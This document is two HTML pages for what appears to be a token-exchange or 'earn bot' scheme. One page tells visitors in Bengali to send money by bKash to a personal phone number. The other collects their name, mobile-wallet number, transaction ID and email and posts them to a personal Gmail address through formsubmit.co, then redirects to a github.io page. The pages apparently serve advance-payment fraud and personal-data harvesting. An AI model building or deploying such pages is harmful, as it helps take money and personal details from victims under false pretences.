<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>এক নজরে দেখে নিন</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f0f9f0;
      padding: 20px;
    }
    .container {
      max-width: 500px;
      margin: auto;
      background: white;
      padding: 25px;
      border-radius: 12px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      text-align: center;
    }
    h2 {
      color: #004d00;
    }
    .details {
      margin: 20px 0;
      font-size: 18px;
    }
    .highlight {
      color: #d00;
      font-weight: bold;
    }
    .copy-btn {
      background: #007bff;
      color: white;
      padding: 10px 15px;
      border: none;
      border-radius: 6px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div class="container">
    <h2>এক নজরে দেখে নিন</h2>
    <div class="details">
      আপনি পাবেন <span id="sendAmount">--</span><br/>
      আপনাকে পাঠাতে হবে <span id="receiveAmount">--</span> BDT
    </div>

    <p>অবশ্যই বিকাশ অ্যাপ থেকে সেন্ড মানি করবেন:</p>
    <p class="highlight">bKash: 01847758163</p>

    <p>টাকা পাঠানোর পর ট্রানজেকশন আইডি মোবাইল নাম্বার নাম নিচের বক্সে দিন</p>

    <button class="copy-btn" onclick="copyNumber()">Copy Number</button>
  </div>

  <script>
    // Get URL parameters
    const params = new URLSearchParams(window.location.search);
    const send = params.get('send');
    const receive = params.get('receive');

    // Display values
    document.getElementById('sendAmount').innerText = `${send} Token`;
    document.getElementById('receiveAmount').innerText = receive;

    function copyNumber() {
      const tempInput = document.createElement("input");
      tempInput.value = "01847758163"; // your number here
      document.body.appendChild(tempInput);
      tempInput.select();
      document.execCommand("copy");
      document.body.removeChild(tempInput);
      alert("Number copied to clipboard!");
    }
  </script>
</body>
</html>







<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Exchange Confirmation</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f2fff5;
      padding: 20px;
    }
    .container {
      max-width: 500px;
      margin: auto;
      background: #fff;
      padding: 20px;
      border-radius: 12px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }
    h2 {
      text-align: center;
      color: #006400;
    }
    label {
      display: block;
      margin-top: 15px;
    }
    input, textarea {
      width: 100%;
      padding: 10px;
      border-radius: 6px;
      border: 1px solid #ccc;
      margin-top: 5px;
    }
    button {
      margin-top: 20px;
      width: 100%;
      background-color: #28a745;
      color: white;
      border: none;
      padding: 12px;
      font-size: 16px;
      border-radius: 6px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div class="container">
    <h2>Submit yor details</h2>
    <form action="https://formsubmit.co/idfacebook715@gmail.com" method="POST">
      <!-- Optional security settings -->
      <input type="hidden" name="_captcha" value="false">
      <input type="hidden" name="_template" value="table">
      <input type="hidden" name="_next" value="https://shohansathi69.github.io/earnbot31.github.io/thankyou.html">

      <label>Your Full Name</label>
      <input type="text" name="Full Name" required>

      <label>Mobile Number (bKash/Nagad)</label>
      <input type="text" name="Mobile Number" required>

      <label>Amount Sent (BDT)</label>
      <input type="text" name="Sent USD Amount" required>

      <label>Transaction ID</label>
      <input type="text" name="Transaction ID" required>

      <label>Additional Message (Optional)</label>
      <textarea name="Message" rows="3"></textarea>

      <label>Your Email</label>
      <input type="text" name="Email" required>

      <button type="submit">Submit Exchange</button>
    </form>
  </div>
</body>
</html>
